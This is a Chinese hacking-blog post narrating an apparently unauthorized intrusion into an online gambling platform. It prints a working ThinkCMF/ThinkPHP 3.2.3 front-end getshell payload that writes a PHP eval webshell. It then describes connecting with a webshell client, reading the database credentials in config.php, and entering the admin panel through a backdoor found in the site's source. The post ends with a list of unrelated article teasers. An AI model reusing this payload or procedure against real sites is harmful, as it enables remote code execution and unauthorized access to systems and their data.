渗透小计之「竟然有人在网赌平台代码里下毒」

访客4年前黑客文章705

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

1608950324_5fe6a23450ebaf27b1806.png!small?1608950324080

进去之后在url处构造报错

1608949555_5fe69f33c999ae566e1cd.png!small?1608949555635

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

1608949768_5fe6a008065c146cdc01d.png!small?1608949767848

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

1608950091_5fe6a14bedb97de6b3050.png!small?1608950091964

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

1608950289_5fe6a211ecb71294db37e.png!small?1608950289732

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

1608950667_5fe6a38b3a8f9a6467892.png!small?1608950667016

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

红枫盆景(红枫盆景修根移盆)

  红枫树盆景露根要领:1. 提根露根法:若欲树桩盆景的根系暴露盆面,以增添盆景的古朴龙钟,可以换盆时逐年向上提根,使下部新根深扎,并将提出的盆面根系,适当疏。。  红枫光照要求长短常高的,因此在种植...

落网音乐网页在线下载工具,小白必备

奥利给曾经向人人推荐过落网,一个有品位的音乐台 往期回首:推荐一个有品味的音乐台,落网音乐电台...

黑客犯罪判决(黑客犯罪定罪量刑标准)

黑客犯罪判决(黑客犯罪定罪量刑标准)

怎么才算网络犯罪? 1、法律主观:网络犯罪的类型具体包括侵犯个人隐私、商业秘密和国家秘密;制造、传播计算机病毒;销售赃物;网络诈骗;贩卖违禁物品、管制物品,比如枪支、毒品等。2、法律分析:网络窃密。利...

tRat:新模块化RAT

TA505是Proofpoint一直关注的攻击组织,该组织从2014年开始活跃。最近,研究人员发现该组织在传播一些远程访问木马(remote access Trojans,RATs)和其他收集、加载和...

经常落枕是怎么回事?5招快速解决落枕困扰

经常落枕是怎么回事?5招快速解决落枕困扰

为什么经常出现落枕呢? 落枕病因主要有两个方面:一是肌肉扭伤,如果晚上睡觉姿势不正确,头颈长时间处于扭曲状态;或因睡眠时枕头不合适,过高、过低或过硬,均可引起颈部一侧肌肉紧张,使颈椎小关节扭...

黑客盗微信号是真的吗(靠谱的盗微信密码黑客

 首先被发现的是Simjacker,该漏洞会从安全程度低的手机网络供应商着手,利用恶意短讯盗取手机用家的位置资讯,后来进化至用作欺诈、诈骗电话、资讯泄露、拒绝服务攻击,甚至可以被用来从事间谍活动。...